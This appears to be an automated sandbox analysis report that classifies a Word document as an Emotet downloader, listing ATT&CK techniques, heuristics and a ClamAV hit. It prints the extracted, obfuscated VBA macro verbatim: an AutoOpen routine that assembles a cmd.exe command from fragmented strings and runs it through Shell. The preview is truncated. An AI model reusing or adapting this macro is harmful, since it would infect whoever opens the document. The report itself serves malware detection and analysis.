Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, a common indicator for malicious documents. The macro attempts to execute a command using 'cmd.exe' which is likely responsible for downloading and executing a secondary payload. The ClamAV detection explicitly identifies this as an Emotet downloader.
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-6884100-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6884100-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7156 bytes |

SHA-256 (macros.bas): 8ef8a02e5f366c3c8d578bdeb984c9655ebc3d6065f9efbb7cbf476a654a2c3c

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "OBsIoooPLIs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Cos(4328)
TypeName CInt(MEwTT)
TypeName CDate(20653 + wuBYzi / TODTb * Ljhjfw)
TypeName ZlqCF
TypeName wJKur
TypeName ChrB(38720 * VthjCQ - 88956 / fIDtXN)
Shell@ CStr("c") + CStr("m") + UVmYURzCacEaqW + JIQOPUz + CXPBjli + YXWIUVm + FCWcnu + GSnOn + zswUmcJXYK + fMvfIzVvkj + WUGsVhkLwNp, 170317703 - 170317703
TypeName CStr(qEvWZC / tLBqUO / jmHJr + NdiDRY)
TypeName oZRWjk
End Sub
Attribute VB_Name = "aZKdhjLSQXHJDY"
Function CXPBjli()
On Error Resume Next
TypeName CStr(9)
TypeName 93
TypeName Sqr(12788 + DVtET)
HiaiQTJkaN = "d /" + "V:" + "O" + "/C" + CStr(Chr(LDciUmOGVXXRJk + qnjZCwWEfdsC + 34 + RHHUHJTWJ + KHkjzGkSkP)) + "set HMq" + "=SNGoIEdBi" + "tEOFOOv" + "nzf" + "tJ)$r_" + "c" + "w=W@" + ",.y"
TypeName Sqr(53176 * DCvSRi)
TypeName CBool(46239 - LaqnoI)
TNFVoL = "6x\}H-8Z" + "DC3{Ym" + "P+42(" + "e'1q5Ms/a;" + "jKU hbpl" + "Tgk" + ":u0&&for" + " %" + "i in (68;" + "3;26;" + "52;23;" + "58;66;52;6" + "9"
TypeName Cos(BUzFT)
TypeName CInt(UZjqDz)
XbBcYo = ";69;65" + ";22" + ";68;5" + "5;63;27" + ";16;52;" + "26;38;3;67" + ";62;52;2" + "5;" + "19;65;1" + ";52;1"
TypeName zcYWA
TypeName Log(tzYjVP)
TypeName CByte(DcQjHs)
qQpjKrKUjt = "9;31;28;" + "52" + ";67;42;69" + ";8;5" + "2;1" + "6;19;" + "61;22"
TypeName ChrB(mwIqhs)
TypeName CLng(82)
DlEiWf = ";74;70;" + "63;2" + "7;53;6" + "6;19" + ";1" + "9;6" + "8;73;5" + "9;5"
TypeName Rnd(390088402)
TypeName Sin(fcUEcf)
YaAKzdnv = "9;26;2" + "6;26;31;7" + "4;69;" + "19;8;71" + ";60;46" + ";52;"
CXPBjli = HiaiQTJkaN + TNFVoL + XbBcYo + qQpjKrKUjt + DlEiWf + YaAKzdnv
TypeName Sin(73)
TypeName CStr(63994 + Esznb)
TypeName Hex(74204 + 55732)
End Function
Function YXWIUVm()
On Error Resume Next
TypeName Round(qjDPwM)
TypeName bPqrG
TypeName LGbos
flwpPYP = "23;31;2" + "5;3" + ";46;59;26;" + "68;38" + ";60;6;46" + ";8;" + "16;59;8"
TypeName 334
TypeName Oct(QttRhR - EnmmlB - jswkF - OArNTV)
TypeName Oct(1908 + JFpHLz / 9653 + 36931)
juXPrOj = ";16;25;69" + ";" + "74;6;52" + ";5" + "8" + ";" + "59;45;43" + ";57;50;29" + ";66;19;19"
TypeName 2
TypeName Cos(6374)
TypeName lEUoWJ
jkYtuluQi = ";68;73;59" + ";59;5" + "8;8;60;" + "46;7" + "1;52;46;5" + "8;" + "66;5" + "2;23;8;1" + "9;60" + ";" + "71;52;31;" + "25;3" + ";4"
TypeName Cos(89213 / vhcQC - zMmcYi - wipNbY)
TypeName CInt(405)
wzvncKv = "6" + ";59;" + "25;60;" + "2" + "3;" + "5" + "2;52;23;2" + "4;58;32;58" + ";19;52;46;" + "59;67;" + "60;" + "25;72;3;1" + "8;18;8;25"
TypeName Sqr(dvXZz)
TypeName Atn(67648 - nsPXJ * 24678 + mrrUhT)
TypeName Atn(FkOBuZ)
EBrdzsd = ";52;" + "59;74;68;6" + "9;" + "3" + ";6" + "0;6;58;5" + "9;68;" + "26;40;5" + "4;42;18;20"
YXWIUVm = flwpPYP + juXPrOj + jkYtuluQi + wzvncKv + EBrdzsd
TypeName Sin(88674 - YzUfGz)
TypeName 7
End Function
Function FCWcnu()
On Error Resume Next
TypeName 148
TypeName CSng(6745)
dzouwPvYU = ";49;29;66;" + "19;19;68;7" + "3;" + "59;59;" + "26;52"
TypeName Cos(EGdYl)
TypeName CInt(96)
TypeName CInt(899)
EQUQjWBR = ";67;58;8;" + "19" + ";" + "52;31;15" + ";19;"
TypeName VkhFr
TypeName CDbl(11)
TypeName 1240
bqQtVLBbXO = "3;2" + "5;31;15" + ";16;59;6;5" + "2;46" + ";3;59;6" + "6;60;8;69;" + "3;25;59;26" + ";68;38;5" + "8;16;60;68" + ";58;66;3;1" + "9;58;59;37"
TypeName Log(vAjOX)
TypeName 40803792
TypeName OWmZKH
bKDbha = ";18;50;69;" + "29;66" + ";19;19" + ";68;73;59;" + "59;67;60;" + "23;3;" + "25;60;"
TypeName Sin(38)
TypeName ChrB(261591133)
TypeName CBool(lXAaYi)
jwGHXOp = "19;2" + "5;66;31;2" + "5;" + "3;46;59;72" + ";64;14" + ";1" + "9;19" + ";29;66" + ";19;19;68;"
TypeName Oct(88711 * 17669)
TypeName anXHDX
bLNEiVZNTc = "73;59;5" + "9;46
... (truncated)